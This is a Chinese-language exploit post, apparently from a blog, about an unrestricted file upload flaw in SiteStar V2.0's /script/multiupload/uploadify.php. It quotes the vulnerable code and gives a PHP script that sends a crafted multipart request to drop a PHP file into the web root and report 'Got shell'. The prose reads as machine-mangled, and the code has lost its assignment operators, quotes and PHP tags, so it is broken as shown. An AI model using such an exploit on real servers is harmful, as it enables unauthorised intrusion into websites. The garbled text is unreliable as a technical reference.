建站之星SiteStar V2.0 上传破绽
SiteStar V2.0不准确限度文件的上传,远程攻打者可能应用此漏洞上传任意文件到Web目录,终极导致在服务器上履行任意命令。
漏洞发生在 /script/multiupload/uploadify.php文件:
php
if (!empty($_FILES)) {
$tempFile $_FILES.'Filedata'..'tmp_name'.;
$targetPath $_SERVER.'DOCUMENT_ROOT'. . $_POST.'folder'. . '/';
$targetFile str_replace('//','/',$targetPath) . $_FILES.'Filedata'..'name'.;
// 解决Windows中文文件名乱码
if (preg_match( /^WIN/i , PHP_OS)) {
$targetFile iconv('UTF8', 'GBK', $targetFile);
}
move_uploaded_file($tempFile, $targetFile);
echo 1 ;
}
没什么好说的,初级失误。通过结构html表单可直接上传webshell至web目录,下面供给一段测试代码。EXP:
print_r('
++
SiteStar V2.0 Remote Shell Upload Exploit
++
');
if ($argc 3)
{
print \nUsage: php $argv.0. host path\n ;
print Example: php $argv.0. localhost /sitestar/\n ;
die();
}
error_reporting(0);
set_time_limit(0);
$host $argv.1.;
$path $argv.2.;
$shell ''.$host.$path.'cnryan.php';
$payload cnryan\r\n ;
$payload . ContentDisposition: formdata; name\ Filedata\ ; filename\ cnryan.php\ \r\n ;
$payload . ContentType: application/octetstream\r\n\r\n ;
$payload . php phpinfo(); W.S.T\r\ncnryan\r\n ;
$payload . ContentDisposition: formdata; name\ upload\ \r\n\r\n\r\n ;
$payload . cnryan\r\n ;
$payload . ContentDisposition: formdata; name\ folder\ \r\n\r\n ;
$payload . $path\r\n ;
$payload . cnryan ;
$packet POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n ;
$packet . Host: {$host}\r\n ;
$packet . Connection: keepalive\r\n ;
$packet . ContentType: multipart/formdata; boundarycnryan\r\n ;
$packet . ContentLength: .strlen($payload). \r\n\r\n ;
$packet . $payload;
$fp fsockopen($host, 80);
fputs($fp, $packet);
sleep(5);
$strfile_get_contents($shell);
if(strpos($str,'W.S.T'))
exit( OK! Got shell:\t$shell\n );
else
exit( Exploit Failed!\n );
by cnryan
阅读(133) | 评论(0) | 转发(0) |